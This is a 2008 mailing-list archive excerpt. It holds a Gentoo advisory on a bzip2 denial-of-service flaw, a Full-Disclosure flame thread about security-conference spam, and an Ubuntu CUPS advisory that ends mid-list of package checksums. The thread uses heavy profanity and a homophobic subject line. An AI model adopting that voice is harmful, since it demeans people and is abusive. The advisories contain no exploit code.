- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: bzip2: Denial of Service
      Date: April 02, 2008
      Bugs: #213820
        ID: 200804-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overread vulnerability has been discovered in Bzip2.

Background
==========

bzip2 is a free and open source lossless data compression program.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  app-arch/bzip2       < 1.0.5                             >= 1.0.5

Description
===========

The Oulu University discovered that bzip2 does not properly check
offsets provided by the bzip2 file, leading to a buffer overread.

Impact
======

Remote attackers can entice a user or automated system to open a
specially crafted file that triggers a buffer overread, causing a
Denial of Service. libbz2 and programs linking against it are also
affected.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All bzip2 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-arch/bzip2-1.0.5"

References
==========

  [ 1 ] CVE-2008-1372
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1372

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFH8/fIuhJ+ozIKI5gRAjfcAJ9wLqBQ+PQUFrcINyuefjpEXH9YggCgg5Ij
434KWguF4ipNmPXLhqN3rxs=
=wki3
-----END PGP SIGNATURE-----



From xploitable at gmail.com  Wed Apr  2 23:33:50 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Apr 2008 23:33:50 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference
	spamming its fucking gay
In-Reply-To: <4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
Message-ID: <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>

I don't want people to get angry about this, this is actually a serious
issue that n3td3v has noticed, and those security guys who are subscribed to
more than one mailing list will understand. Full-Disclosure, I want action
taken on the *growing* amount of security conference spam. It used to be
acceptable, but these days its becoming intolerable. I don't know who in the
security community would setup a mailing list for security conferences to
advertise and get feedback from, but I think one should be created. Gadi
Evron might be able to set a security conference mailing list up? I don't
know. Who else is into the mailing list creation business? For sure though,
there is an issue with Securityfocus accepting security conference spam on
their mailing lists, and its not even funny now. The security conferences
spam lists like vuln-dev and pen-test and the Securityfocus boys still
accept it onto the mailing list, even though its been already accepted on
the big main mailing lists a day or so before. What happens is, folks who
are good at security, and are subscribed to all the mailing lists, get an
inbox flooded with duplicate security conference spam, and people aren't
even interested. People may think this isn't a big issue, but it is for me
and i've been in contact with people who agree with me, now let's take
action now before we get more security conference spam in our mail boxes.
Securityfocus, stop accepting every security conference e-mail onto *every*
mailing list, i'm becoming increasingly angry. Now somethings got to be done
about this, and i'm calling for security community support for this, as the
growing number of security conferences grow every year, and the problem will
only get bigger and bigger, so let's join as one to get this situation
sorted.

Forwarded conversation
Subject: Let's outlaw mass security conference spamming its fucking gay
------------------------

From: *n3td3v* <xploitable at gmail.com>
Date: Wed, Apr 2, 2008 at 4:06 AM
To: n3td3v <n3td3v at googlegroups.com>


i'm sick of the security conferences spamming every single fucking
security mailing list on the internet about their security conference,
its getting out of hand now and there are more and more new
conferences appearing by the month.

isn't it about time there was a new mailing list just for advertsing
and talking about security conferences, fucking hell. when you're
subscribed to 20 or more mailing lists and each one is spammed with
the exact same advert, it becomes a fucking pain in the fucking neck.

someone create a mailing list for security conferences, i'm going off
my head here!!!

back in the day it was fine with getting e-mail once or twice a year
about a security conference, but now there are so many being announced
that these commercial venutres are creating their own unsolicited mail
(SPAM) eco-system.

i'm beginning to wonder when enough will be enough and a public outcry
will take place.

already i've shouted down those fucks from offensive-security.com for
doing it, but i can't keep publically flagging-as-spam everytime
because these
mass-multi-mailing-list-announcements-are-happening-more-often-now-than-not.

i would just end up sounding like a fucking parrot.

fuck you security conferences you dick fucks, stop
mass-mailing-everyone-is-subscribed-to-the-same-mailing-lists-no-need-to-spam-every-single-one-you-fucking-morons.

no there won't be a n3td3v cyber security conference i can't be fucked
anymore its a boring idea so die!!!

why the fuck does securityfocus allow security conferences to spam
every single last mailing list of theres? what the fuck!!!

i'm going crazy with the security conference spam insanity!!!

regards,

n3td3v
----------
From: *Aaron Gray* <aaronngray at gmail.com>
Date: Wed, Apr 2, 2008 at 5:22 PM
To: n3td3v at googlegroups.com


Don't agree with the gay bashing header thats getting so boring.

But "someone create a mailing list for security conferences" is a pritty
sound idea.

"i'm going off my head here!!!", aint you always...

----------
From: *n3td3v* <xploitable at gmail.com>
Date: Wed, Apr 2, 2008 at 5:40 PM
To: n3td3v at googlegroups.com


Its not a reference to homosexuals.
If they were non-commercial it would be fine, but what it amounts to
is commercial spam the same as viagra etc.

Back in the day it was only one or two conferences getting *mass*
announced, but now there are tons of conferences and they keep sending
their shit to every single e-mail list they can think of.
Nope... only when I see security conferences being spammed on *every*
mailing list possible.

The result, about ten copies of the same e-mail sitting on my mail
box, asking me to purchase a ticket or buy security training.

This has to be nipped on the bud at the highest priority and urgency!!!

Its SPAM, so let's not dress it up as something else... get these
fucks blacklisted like the viagra spammers!!!

regards,

n3td3v
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/a039ab1a/attachment.html 

From ureleet at gmail.com  Wed Apr  2 23:42:27 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 2 Apr 2008 18:42:27 -0400
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference
	spamming its fucking gay
In-Reply-To: <4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
Message-ID: <6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>

"Full-Disclosure, I want action taken on the *growing* amount of
security conference spam."

u do know that just because you demand or want action taken that it
doesn't mean that such will take place right?

stop trolling.



From ureleet at gmail.com  Wed Apr  2 23:46:34 2008
From: ureleet at gmail.com (Ureleet)
Date: Wed, 2 Apr 2008 18:46:34 -0400
Subject: [Full-disclosure] n3td3v has a fan
Message-ID: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>

you like him because he posts ur articles.

you can have him.

stop trolling.

On Wed, Apr 2, 2008 at 5:17 PM, n3td3v <xploitable at gmail.com> wrote:
> On Wed, Apr 2, 2008 at 10:08 PM, Paul Schmehl <pauls at utdallas.edu> wrote:
>  > --On Wednesday, April 02, 2008 21:26:03 +0100 n3td3v <xploitable at gmail.com>
>  >  wrote:
>  >  >
>  >
>  > > No, it was sending signals to important people to take action to get
>  >  > it further pushed up the ladder. In no way do I expect my e-mail to be
>  >  > directly looked at by the white house. Through signal intelligence,
>  >  > the folks at GCHQ and NSA would see it and it would infulence others
>  >  > who lurk on this list to take action. And for your information, thats
>  >  > whats happened.
>  >  >
>  >
>  >  At first I thought, "How silly", but then I got to thinking about it.....
>  >
>  >  I'll bet the NSA *does* monitor your communications.  After all, spying is
>  >  serious business.  Those guys probably need an occasional laugh to break the
>  >  tension.  Monitoring your communications almost guarantees them a laugh every
>  >  day.
>
>  Why did you cut the link out from the guy who says "I have sent a plea
>
> for assistance to some of my contacts within the US government and
>  hope others do as well to get this issue resolved."
>  http://blog.securitynow.us/2008/03/19/storm-worm-russian-business-network-rbn/
>
>  And he isn't a nobody, http://blog.securitynow.us/about/
>
>  "I have worked as an employee and consultant to many large
>  corporations (Fortune 500) and government agencies along with
>  non-profit groups performing security auditing and and secure
>  system/solution design and implementations."
>
>  So suck you foo,
>
>  n3td3v
>
>
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>



From xploitable at gmail.com  Thu Apr  3 00:09:06 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Apr 2008 00:09:06 +0100
Subject: [Full-disclosure] Fwd: Let's outlaw mass security conference
	spamming its fucking gay
In-Reply-To: <6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>
References: <4b6ee9310804012006t1c27a5cey3faf280ef0c43008@mail.gmail.com>
	<d7a80eb10804020922s6b4810e0o3a41bffc05b24ae7@mail.gmail.com>
	<4b6ee9310804020940sfb838e2ncf96927f97c2a1f6@mail.gmail.com>
	<4b6ee9310804021533y1609769dke5a52d1078e5955e@mail.gmail.com>
	<6158bb410804021542l39618e7bnf1ad121023511ec8@mail.gmail.com>
Message-ID: <4b6ee9310804021609x6d0e9c86l91cfb79806be3f6d@mail.gmail.com>

On Wed, Apr 2, 2008 at 11:42 PM, Ureleet <ureleet at gmail.com> wrote:
> "Full-Disclosure, I want action taken on the *growing* amount of
>  security conference spam."
>
>  u do know that just because you demand or want action taken that it
>  doesn't mean that such will take place right?
>
>  stop trolling.

I'm not trolling if I want a security conference mailing list setup so
the rest of us don't need to suffer an inbox of 20 identical
commerical *come to our conference, or, book our training*.

This is a big issue, and if we dont create a mailing list for it, next
year we won't have 20 duplicates per spam run, we'll have 40 per spam
run.

Imagine if n3td3v post to *every* mailing list and not just *one*,
would you not get tired and frustrated?

All the best,

n3td3v



From xploitable at gmail.com  Thu Apr  3 00:13:53 2008
From: xploitable at gmail.com (n3td3v)
Date: Thu, 3 Apr 2008 00:13:53 +0100
Subject: [Full-disclosure] n3td3v has a fan
In-Reply-To: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>
References: <6158bb410804021546q1bd945d4ydb0eb50c0e900aee@mail.gmail.com>
Message-ID: <4b6ee9310804021613n628cd00bj706125788bff60de@mail.gmail.com>

On Wed, Apr 2, 2008 at 11:46 PM, Ureleet <ureleet at gmail.com> wrote:
> you like him because he posts ur articles.
>
>  you can have him.
>
>  stop trolling.

I'm the one at the forefront of security trying to make a difference,
and what are you? He supports me because of my cause to stop the Storm
Worm, so what solutions have you got, instead of annoying everyone?



From jamie at canonical.com  Thu Apr  3 00:17:09 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Wed, 2 Apr 2008 19:17:09 -0400
Subject: [Full-disclosure] [USN-598-1] CUPS vulnerabilities
Message-ID: <20080402231709.GB6848@severus.strandboge.com>

=========================================================== 
Ubuntu Security Notice USN-598-1             April 02, 2008
cupsys vulnerabilities
CVE-2008-0047, CVE-2008-0053, CVE-2008-0882, CVE-2008-1373
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  cupsys                          1.2.2-0ubuntu0.6.06.8

Ubuntu 6.10:
  cupsys                          1.2.4-2ubuntu3.3

Ubuntu 7.04:
  cupsys                          1.2.8-0ubuntu8.3

Ubuntu 7.10:
  cupsys                          1.3.2-1ubuntu7.6

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that the CUPS administration interface contained a heap-
based overflow flaw. A local attacker, and a remote attacker if printer
sharing is enabled, could send a malicious request and possibly execute
arbitrary code as the non-root user in Ubuntu 6.06 LTS, 6.10, and 7.04.
In Ubuntu 7.10, attackers would be isolated by the AppArmor CUPS profile.
(CVE-2008-0047)

It was discovered that the hpgl filter in CUPS did not properly validate
its input when parsing parameters. If a crafted HP-GL/2 file were printed,
an attacker could possibly execute arbitrary code as the non-root user
in Ubuntu 6.06 LTS, 6.10, and 7.04. In Ubuntu 7.10, attackers would be
isolated by the AppArmor CUPS profile. (CVE-2008-0053)

It was discovered that CUPS had a flaw in its managing of remote shared
printers via IPP. A remote attacker could send a crafted UDP packet and
cause a denial of service or possibly execute arbitrary code as the
non-root user in Ubuntu 6.06 LTS, 6.10, and 7.04. In Ubuntu 7.10,
attackers would be isolated by the AppArmor CUPS profile. (CVE-2008-0882)

It was discovered that CUPS did not properly perform bounds checking in
its GIF decoding routines. If a crafted GIF file were printed, an attacker
could possibly execute arbitrary code as the non-root user in Ubuntu 6.06
LTS, 6.10, and 7.04. In Ubuntu 7.10, attackers would be isolated by the
AppArmor CUPS profile. (CVE-2008-1373)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8.diff.gz
      Size/MD5:    97650 b7ac4b760066920314d4596541cf716e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8.dsc
      Size/MD5:     1049 26e617c4b5c0848d56f872895e279a86
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2.orig.tar.gz
      Size/MD5:  4070384 2c99b8aa4c8dc25c8a84f9c06aa52e3e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.2.2-0ubuntu0.6.06.8_all.deb
      Size/MD5:      998 c7d4013c3b9e3655e2fd2e9719d4d2af

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_amd64.deb
      Size/MD5:    36218 9eff8fd692afe5ae17ca80f269a0ca6b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_amd64.deb
      Size/MD5:    81906 ac05150f42e5671c5cdc73ba8f85cb5b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_amd64.deb
      Size/MD5:  2286026 acd4a48c676556fc7260bbd86db0416b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_amd64.deb
      Size/MD5:     6096 3df7829bfb8766de94a4ef2ff0be824f
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_amd64.deb
      Size/MD5:    76654 0d67c8599d4e2accf4f7ee31b498fdc7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_amd64.deb
      Size/MD5:    25758 14617ef9d38146ceaf89b4e9775e2fb4
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_amd64.deb
      Size/MD5:   129498 5cd8c821b31dddde0c200a61570d48b6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_i386.deb
      Size/MD5:    34766 88ac5bced1d508f9695b4b4f4ae0f82a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_i386.deb
      Size/MD5:    77988 84db3f3ad17936d5015a26353c55bc6a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_i386.deb
      Size/MD5:  2253492 2cc1ec94caf6344a555ece9f69b51fe2
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_i386.deb
      Size/MD5:     6088 00226da0a854f64bd5b18ace219de031
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_i386.deb
      Size/MD5:    75744 73038a225d7301b4b5f8085219c97c81
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_i386.deb
      Size/MD5:    25740 52699a4b9dea621f4332db5856f8b574
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_i386.deb
      Size/MD5:   121718 2e904399c40c9f83e451bb2e964820c1

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_powerpc.deb
      Size/MD5:    40464 7e6bd3ec6312eef104737ffed5e19c3c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_powerpc.deb
      Size/MD5:    89542 8b9353d17d9402495f2404a9ab837b92
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_powerpc.deb
      Size/MD5:  2300680 65597d07917b8753a0af6f6aae1276db
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_powerpc.deb
      Size/MD5:     6096 d6cb4780e6f4545bc8566cce92fb8346
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_powerpc.deb
      Size/MD5:    78442 c75b4f47491227c2504649902a040855
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_powerpc.deb
      Size/MD5:    25742 372a1c972e97e1722a844430780ae6c5
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_powerpc.deb
      Size/MD5:   127478 afad79a272bbe434675f24d7a3ca91ef

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.8_sparc.deb
      Size/MD5:    35396 b44ad7e913ff064d2a3fb73121771686
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.8_sparc.deb
      Size/MD5:    78724 a8bff0942be4b14ece6dde8fd38b6f5a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.8_sparc.deb
      Size/MD5:  2287122 2415f6a5410a63b98ba32ecdf8fbcfb7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.8_sparc.deb
      Size/MD5:     6094 384dc8a7b9c8dfbefa42d7b5fbb836c7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.8_sparc.deb
      Size/MD5:    75678 6258f4d4c1b55d90b34cee1caa12dc35
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.8_sparc.deb
      Size/MD5:    25740 ca7f1a4412f42d739d51c1ddbc09045a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.8_sparc.deb
      Size/MD5:   123214 801292f8a2652b579a82b7a7c52e9ffd

Updated packages for Ubuntu 6.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3.diff.gz
      Size/MD5:   111410 fb84af4bcf007f2f7299394e0be32412
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3.dsc
      Size/MD5:     1059 430be555857b7aa5cc01431466487aaf
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4.orig.tar.gz
      Size/MD5:  4091480 46722ad2dc78b12b5c05db2d080fe784

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.2.4-2ubuntu3.3_all.deb
      Size/MD5:   870052 97e82b21269a8bb5e7ac995cc4cb665d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_amd64.deb
      Size/MD5:    36706 eb308fea40f4b7d159304b4b875b2329
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_amd64.deb
      Size/MD5:    82506 3b04032674acc75d3184f537af144d3a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_amd64.deb
      Size/MD5:  1480680 18b1537c8238b225e6ba2bb51570b942
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_amd64.deb
      Size/MD5:     6122 b324305be458b5207d242efc230d06c1
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_amd64.deb
      Size/MD5:    95522 fce843ba1e5c51ec7a8161f0a0828acc
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_amd64.deb
      Size/MD5:    26138 041e52bad239d993b22d65873705a751
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_amd64.deb
      Size/MD5:   172282 cf3fd3c84c83b36aa453ca2e071ab74c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_i386.deb
      Size/MD5:    36260 c2daeb19fee1ebfe794be09ebefef1c7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_i386.deb
      Size/MD5:    80108 c599f739a103867967a78f91569db74e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_i386.deb
      Size/MD5:  1463912 d22879a24e9f1ff1d12e7845ad596cc2
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_i386.deb
      Size/MD5:     6124 01628551a9fc66423789f02853d0d9ba
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_i386.deb
      Size/MD5:    95352 b6084c36087da3aa1a3c8d44f9a9d0a7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_i386.deb
      Size/MD5:    26142 838499ddbf886c5514ef11c6e4bdeda9
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_i386.deb
      Size/MD5:   169404 8262471b1cdb9991fbde554a31c74508

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_powerpc.deb
      Size/MD5:    41802 b703ca8629e5df46fc1f1d45acd20581
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_powerpc.deb
      Size/MD5:    91148 caca2486db7794b133539af9b939a607
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_powerpc.deb
      Size/MD5:  1498496 0662d077dfae2d1b6b00db7a0966366b
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_powerpc.deb
      Size/MD5:     6128 792c5ee645b0f7a7e1d63d9206348c52
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_powerpc.deb
      Size/MD5:    97682 b37660eb88a487e5f7c49b9ed6f1c937
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_powerpc.deb
      Size/MD5:    26144 b834556e6374093f5652754dd8c0ff6a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_powerpc.deb
      Size/MD5:   172694 3174ff36eaa0bc4ac7f4df02299413ca

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.4-2ubuntu3.3_sparc.deb
      Size/MD5:    36292 2cd1ea5a42eff193ca8a4c2ec53aefa1
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.4-2ubuntu3.3_sparc.deb
      Size/MD5:    80238 10b95fff38cb0436cf30a30e683cc27d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.4-2ubuntu3.3_sparc.deb
      Size/MD5:  1489214 119f077088e3b2009c896fd395448717
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.4-2ubuntu3.3_sparc.deb
      Size/MD5:     6128 204a14898a9508a980e71d33792cfb59
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.4-2ubuntu3.3_sparc.deb
      Size/MD5:    94574 a87580c3fd22da592dd5496190afb871
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.4-2ubuntu3.3_sparc.deb
      Size/MD5:    26142 e7b959209cad884220bb1cacb2cd0555
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.4-2ubuntu3.3_sparc.deb
      Size/MD5:   168700 1f717ec06409999b5a40bb89dcedb5b0

Updated packages for Ubuntu 7.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3.diff.gz
      Size/MD5:   156263 0147ec4c77b27e20df2a3ad514c2dd8e
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3.dsc
      Size/MD5:     1143 7fb2ad1b1c8e57b09805fc9d6c1e027d
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8.orig.tar.gz
      Size/MD5:  4293194 107affe95fcf1cd4aaed4a5c73f4b91f

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-common_1.2.8-0ubuntu8.3_all.deb
      Size/MD5:   926414 97df229c931f7eb05af5a5cb623635ae

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_amd64.deb
      Size/MD5:    37412 20fb406aae21e63dc8c9723e178505af
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_amd64.deb
      Size/MD5:    83238 9aa9eb876585e32757c83783d79b0a02
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_amd64.deb
      Size/MD5:  1638304 7673386b3a9d63c09bd3647cf5dad877
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_amd64.deb
      Size/MD5:    56378 32e2acb4fe5ef7aab8b8896a8d40166c
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_amd64.deb
      Size/MD5:   104324 649109ddb522145730c67b93a870eefe
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_amd64.deb
      Size/MD5:   144860 c0fb60ebae640e565607f0cdfd7094b7
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.8-0ubuntu8.3_amd64.deb
      Size/MD5:   182344 204887dda2791a61417415c4466a51d7

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.8-0ubuntu8.3_i386.deb
      Size/MD5:    36722 22030307f71a44ca7b30921aef0bf46a
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.8-0ubuntu8.3_i386.deb
      Size/MD5:    80738 c92706978d65b9a409d93e704c5662b4
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.8-0ubuntu8.3_i386.deb
      Size/MD5:  1620944 bc9a1e338567e27aee10cded16abbcc2
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.8-0ubuntu8.3_i386.deb
      Size/MD5:    55472 15cd34697cca79ee83498691da531d37
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.8-0ubuntu8.3_i386.deb
      Size/MD5:   104028 3d13c92bf5f0c9a26f3a8ba534dc6dec
    http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.8-0ubuntu8.3_i386.deb
